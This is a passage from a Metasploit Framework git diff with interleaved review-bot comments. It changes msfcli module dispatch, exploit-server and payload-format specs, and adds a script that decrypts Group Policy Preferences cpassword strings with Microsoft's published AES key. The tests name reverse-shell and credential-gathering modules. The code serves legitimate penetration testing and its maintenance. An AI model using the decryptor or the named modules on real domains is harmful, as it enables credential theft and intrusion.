@opts[:format], exeopts) if (!exe && payload.respond_to?(:generate_war)) exe = payload.generate_war.pack - else - exe = ::Msf::Util::EXE.to_jsp_war(exe) end @out.write exe diff --git a/scripts/shell/spawn_meterpreter.rb b/scripts/shell/spawn_meterpreter.rb index a9a0f0f4bd..d45e9d4ac4 100644 --- a/scripts/shell/spawn_meterpreter.rb +++ b/scripts/shell/spawn_meterpreter.rb 
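Review bot: The added `elsif module_name =~ /post\/(.*)/` in msfcli is unanchored, so a module name that merely contains `post/` and matches neither earlier branch is now passed to `@framework.post.create` with only the tail of its name instead of reaching the `else` fallback. Anchoring the pattern restricts the dispatch to names that really start with the type prefix: `elsif module_name =~ /\Apost\/(.*)/`. The `auxiliary` branch shown as context has the same shape and would benefit from the same change. The method starts and ends outside the hunk.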
@@ -85,7 +85,7 @@ begin end opts = { :linemax => linemax, - :decoder => File.join(Msf::Config.data_directory, "data", "exploits", "cmdstager", "vbs_b64"), + :decoder => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64"), #:nodelete => true # keep temp files (for debugging) } exe = Msf::Util::EXE.to_executable(framework, larch, lplat, buf) diff --git a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb index f6a4cd13e0..53d4b035a7 100644 --- a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb +++ b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb 
@@ -64,19 +64,69 @@ describe Msf::Exploit::Remote::BrowserExploitServer do end describe ".get_bad_requirements" do - it "should not contain any bad requirements" do - server.get_bad_requirements(expected_profile).should eq([]) + let(:rejected_requirements) do + server.get_bad_requirements(fake_profile) end - it "should have identify :os_name as a requirement not met" do - fake_profile = { - "rMWwSAwBHLoESpHbEGbsv" => { - :os_name => expected_os_name - }} + context 'when given the expected profile' do + it "should not contain any bad requirements" do + server.get_bad_requirements(expected_profile).should eq([]) + end + end - server.instance_variable_set(:@requirements, {:os_name => /win/i}) - baddies = server.get_bad_requirements(fake_profile) - baddies.should eq([:os_name]) + context 'when attempting to match :os_name' do + let(:fake_profile) do + { :os_name => expected_os_name } + end + + before do + server.instance_variable_set(:@requirements, {:os_name => /win/i}) + end + + it "should have identify :os_name as a requirement not met" do + rejected_requirements.should eq([:os_name]) + end + end + + context 'when attempting to match :ua_ver' do + context 'against version 25.0' do + let(:expected_ua_ver) { '25.0' } + let(:fake_profile) do + { :ua_ver => expected_ua_ver } + end + + before do + server.instance_variable_set(:@requirements, {:ua_ver => ua_ver}) + end + + context "with the regex /26\.0$/" do + let(:ua_ver) { /26\.0$/ } + it "should reject :ua_ver" do + rejected_requirements.should include(:ua_ver) + end + end + + context "with the regex /25\.0$/" do + let(:ua_ver) { /25\.0$/ } + it "should accept :ua_ver" do + rejected_requirements.should_not include(:ua_ver) + end + end + + context "with a Proc that checks if version is between 1-5" do + let(:ua_ver) { lambda{ |ver| ver.to_i.between?(1, 5) } } + it "should reject :ua_ver" do + rejected_requirements.should include(:ua_ver) + end + end + + context "with a Proc that checks if version is between 20-26" do + 
let(:ua_ver) { lambda{ |ver| ver.to_i.between?(20, 26) } } + it "should accept :ua_ver" do + rejected_requirements.should_not include(:ua_ver) + end + end + end end end diff --git a/spec/msfcli_spec.rb b/spec/msfcli_spec.rb index 4cc5a988ec..d2133b28ff 100644 --- a/spec/msfcli_spec.rb +++ b/spec/msfcli_spec.rb @@ -222,6 +222,37 @@ describe Msfcli do end context ".init_modules" do + + it "should inititalize an exploit module" do + args = 'exploit/windows/smb/psexec S' + m = '' + stdout = get_stdout { + cli = Msfcli.new(args.split(' ')) + m = cli.init_modules + } + m[:module].class.to_s.should start_with("Msf::Modules::Mod") + end + + it "should inititalize an auxiliary module" do + args = 'auxiliary/server/browser_autopwn S' + m = '' + stdout = get_stdout { + cli = Msfcli.new(args.split(' ')) + m = cli.init_modules + } + m[:module].class.to_s.should start_with("Msf::Modules::Mod") + end + + it "should inititalize a post module" do + args = 'post/windows/gather/credentials/gpp S' + m = '' + stdout = get_stdout { + cli = Msfcli.new(args.split(' ')) + m = cli.init_modules + } + m[:module].class.to_s.should start_with("Msf::Modules::Mod") + end + it "should have multi/handler module initialized" do args = "multi/handler payload=windows/meterpreter/reverse_tcp lhost=127.0.0.1 E" m = '' @@ -384,4 +415,4 @@ describe Msfcli do end end -end \ No newline at end of file +end diff --git a/spec/support/shared/contexts/msf/util/exe.rb b/spec/support/shared/contexts/msf/util/exe.rb index 9b86fe33c6..e1372a6492 100644 --- a/spec/support/shared/contexts/msf/util/exe.rb +++ b/spec/support/shared/contexts/msf/util/exe.rb 
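Review bot: The `:ua_ver` examples use patterns such as `/25\.0$/`, which are anchored only at the end and use `$` (end of line) rather than `\z`, so the "accept" example would pass just as well for a version string like `125.0`. Specs tend to be copied as the model for real requirement patterns, so I would pin the whole string, e.g. `let(:ua_ver) { /\A25\.0\z/ }`, and add a counter-example with a longer version. Separately, `rejected_requirements` depends on `fake_profile`, which the 'when given the expected profile' context never defines. That example does not call it, but a one-line comment on the `let` saying which contexts must supply `fake_profile` would save the next reader a lookup.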
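Review bot: The three examples added to `.init_modules` assert only that the class name starts with `Msf::Modules::Mod`, which by the look of these tests holds for any loaded module. The post example would therefore still pass if the new `post/` branch in msfcli resolved to the wrong module type. Checking the resolved name pins the behaviour, e.g. `m[:module].fullname.should eq('post/windows/gather/credentials/gpp')`. The `stdout =` assignments are never read and can be dropped, and "inititalize" in the three descriptions is a typo.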
@@ -36,8 +36,8 @@ shared_context 'Msf::Util::Exe' do { :format => "psh", :arch => "x86_64", :file_fp => /ASCII/ }, { :format => "psh-net", :arch => "x86", :file_fp => /ASCII/ }, { :format => "psh-net", :arch => "x86_64", :file_fp => /ASCII/ }, - { :format => "war", :arch => "x86", :file_fp => /Zip/ }, - { :format => "war", :arch => "x86_64", :file_fp => /Zip/ }, + { :format => "war", :arch => "x86", :file_fp => /zip/i }, + { :format => "war", :arch => "x86_64", :file_fp => /zip/i }, { :format => "msi", :arch => "x86", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, { :format => "msi", :arch => "x64", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, { :format => "msi", :arch => "x86_64", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, 
@@ -51,29 +51,29 @@ shared_context 'Msf::Util::Exe' do { :format => "elf", :arch => "armle", :file_fp => /ELF 32.*ARM/ }, { :format => "elf", :arch => "mipsbe", :file_fp => /ELF 32-bit MSB executable, MIPS/ }, { :format => "elf", :arch => "mipsle", :file_fp => /ELF 32-bit LSB executable, MIPS/ }, - { :format => "war", :arch => "x86", :file_fp => /Zip/ }, - { :format => "war", :arch => "x64", :file_fp => /Zip/ }, - { :format => "war", :arch => "armle", :file_fp => /Zip/ }, - { :format => "war", :arch => "mipsbe", :file_fp => /Zip/ }, - { :format => "war", :arch => "mipsle", :file_fp => /Zip/ }, + { :format => "war", :arch => "x86", :file_fp => /zip/i }, + { :format => "war", :arch => "x64", :file_fp => /zip/i }, + { :format => "war", :arch => "armle", :file_fp => /zip/i }, + { :format => "war", :arch => "mipsbe", :file_fp => /zip/i }, + { :format => "war", :arch => "mipsle", :file_fp => /zip/i }, ], "bsd" => [ { :format => "elf", :arch => "x86", :file_fp => /ELF 32.*BSD/ }, - { :format => "war", :arch => "x86", :file_fp => /Zip/ }, + { :format => "war", :arch => "x86", :file_fp => /zip/i }, ], "solaris" => [ { :format => "elf", :arch => "x86", :file_fp => /ELF 32/ }, - { :format => "war", :arch => "x86", :file_fp => /Zip/ }, + { :format => "war", :arch => "x86", :file_fp => /zip/i }, ], "osx" => [ { :format => "macho", :arch => "x86", :file_fp => /Mach-O.*i386/ }, { :format => "macho", :arch => "x64", :file_fp => /Mach-O 64/ }, { :format => "macho", :arch => "armle", :file_fp => /Mach-O.*(acorn|arm)/ }, { :format => "macho", :arch => "ppc", :file_fp => /Mach-O.*ppc/ }, - { :format => "war", :arch => "x86", :file_fp => /Zip/ }, - { :format => "war", :arch => "x64", :file_fp => /Zip/ }, - { :format => "war", :arch => "armle", :file_fp => /Zip/ }, - { :format => "war", :arch => "ppc", :file_fp => /Zip/ }, + { :format => "war", :arch => "x86", :file_fp => /zip/i }, + { :format => "war", :arch => "x64", :file_fp => /zip/i }, + { :format => "war", :arch => "armle", 
:file_fp => /zip/i }, + { :format => "war", :arch => "ppc", :file_fp => /zip/i }, ], } diff --git a/spec/tools/cpassword_decrypt_spec.rb b/spec/tools/cpassword_decrypt_spec.rb new file mode 100644 index 0000000000..addf839222 --- /dev/null +++ b/spec/tools/cpassword_decrypt_spec.rb @@ -0,0 +1,31 @@ +require 'spec_helper' + +load Metasploit::Framework.root.join('tools/cpassword_decrypt.rb').to_path + +require 'fastlib' +require 'msfenv' +require 'msf/base' + +describe CPassword do + context "Class methods" do + let(:cpasswd) do + CPassword.new + end + + context ".decrypt" do + it "should return the decrypted password as 'testpassword'" do + # Encrypted password for "testpassword" + cpass = "AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk" + pass = cpasswd.decrypt(cpass) + pass.should eq('testpassword') + end + + it "should return an empty string due to a bad password" do + # Invalid password format + cpass = "BadPassword" + pass = cpasswd.decrypt(cpass) + pass.should eq('') + end + end + end +end \ No newline at end of file diff --git a/test/modules/auxiliary/test/httpserver.rb b/test/modules/auxiliary/test/httpserver.rb index 6e4d8ea39c..b40819d862 100644 --- a/test/modules/auxiliary/test/httpserver.rb +++ b/test/modules/auxiliary/test/httpserver.rb @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary end =begin - + Test Results - clinet output: msf auxiliary(cisco_asa_asdm) > run @@ -149,6 +149,5 @@ msf auxiliary(httpserver) > run [-] 10.0.1.76 httpserver - Bad login [*] 10.0.1.76 httpserver - Received request: /+webvpn+/index.html [+] Authenticated - - + =end diff --git a/tools/cpassword_decrypt.rb b/tools/cpassword_decrypt.rb new file mode 100755 index 0000000000..24439fc50e --- /dev/null +++ b/tools/cpassword_decrypt.rb 
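Review bot: In the new `cpassword_decrypt_spec.rb`, `load`ing `tools/cpassword_decrypt.rb` into the spec process also defines that script's top-level `usage`, `print_status`, `print_error` and `print_good` on `Object` for the rest of the run, which can hide missing-method failures in unrelated specs. Moving those helpers inside the script's `if __FILE__ == $PROGRAM_NAME` guard, or into a module, would keep the load side-effect free. The contexts are labelled "Class methods" and `.decrypt` although `decrypt` is called on an instance, so `context "#decrypt"` would be the conventional label. Both examples use inputs whose length is not a multiple of four, so the padding branch for already-aligned input is not exercised.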
@@ -0,0 +1,132 @@ +#!/usr/bin/env ruby + +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# +# This script will allow you to specify an encrypted cpassword string using the Microsofts public +# AES key. This is useful if you don't or can't use the GPP post exploitation module. Just paste +# the cpassword encrypted string found in groups.xml or scheduledtasks.xml and it will output the +# decrypted string for you. +# +# Tested Windows Server 2008 R2 Domain Controller. +# +# Authors: +# Ben Campbell +# Loic Jaquemet +# scriptmonkey +# theLightCosine +# mubix (domain/dc enumeration code) +# David Kennedy "ReL1K" +# +# References: +# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +# http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13) +# http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html +# http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx +# +# Demo: +# $ ./cpassword_decrypt.rb AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk +# [+] The decrypted AES password is: testpassword +# + +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end + +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', 'lib'))) +require 'fastlib' +require 'msfenv' +require 'rex' + + +class CPassword + + # + # Decrypts the AES-encrypted cpassword string + # @param encrypted_data [String] The encrypted cpassword + # @return [String] The decrypted string in ASCII + # + def decrypt(encrypted_data) + # Prepare the password for the decoder + padding = "=" * (4 - (encrypted_data.length % 4)) + epassword = "#{encrypted_data}#{padding}" + + # Decode the string using Base64 + decoded = Rex::Text.decode_base64(epassword) + + # Decryption + key = '' + key << 
"\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc" + key << "\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" + begin + aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") + aes.decrypt + aes.key = key + plaintext = aes.update(decoded) + plaintext << aes.final + rescue OpenSSL::Cipher::CipherError + # Decryption failed possibily due to bad input + return '' + end + + # Converts the string to ASCII + Rex::Text.to_ascii(plaintext) + end +end + + +# +# Shows script usage +# +def usage + print_status("Usage: #{__FILE__} [The encrypted cpassword string]") + exit +end + + +# +# Prints a status message +# +def print_status(msg='') + $stderr.puts "[*] #{msg}" +end + + +# +# Prints an error message +# +def print_error(msg='') + $stderr.puts "[-] #{msg}" +end + + +# +# Prints a good message +# +def print_good(msg='') + $stderr.puts "[+] #{msg}" +end + + +# +# main +# +if __FILE__ == $PROGRAM_NAME + pass = ARGV.shift + + # Input check + usage if pass.nil? or pass.empty? + + cpasswd = CPassword.new + pass = cpasswd.decrypt(pass) + + if pass.empty? + print_error("Nothing was decrypted, please check your input.") + else + print_good("The decrypted AES password is: #{pass}") + end +end \ No newline at end of file
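Review bot: In `CPassword#decrypt` the padding line appends four `=` characters when the input length is already a multiple of four, because `4 - (len % 4)` evaluates to 4 in that case. Whether `Rex::Text.decode_base64` tolerates that is not visible here, so I would compute it as `padding = "=" * ((4 - encrypted_data.length % 4) % 4)`. The cipher is used without an IV being set, which relies on the library default. Setting it explicitly, e.g. `aes.iv = "\x00" * 16` if an all-zero IV is what the format specifies (please confirm against the MSDN reference in the header), makes that dependency visible. Only `OpenSSL::Cipher::CipherError` is rescued, so input that decodes to an empty string may surface as a different exception from `aes.update` rather than the documented empty-string result.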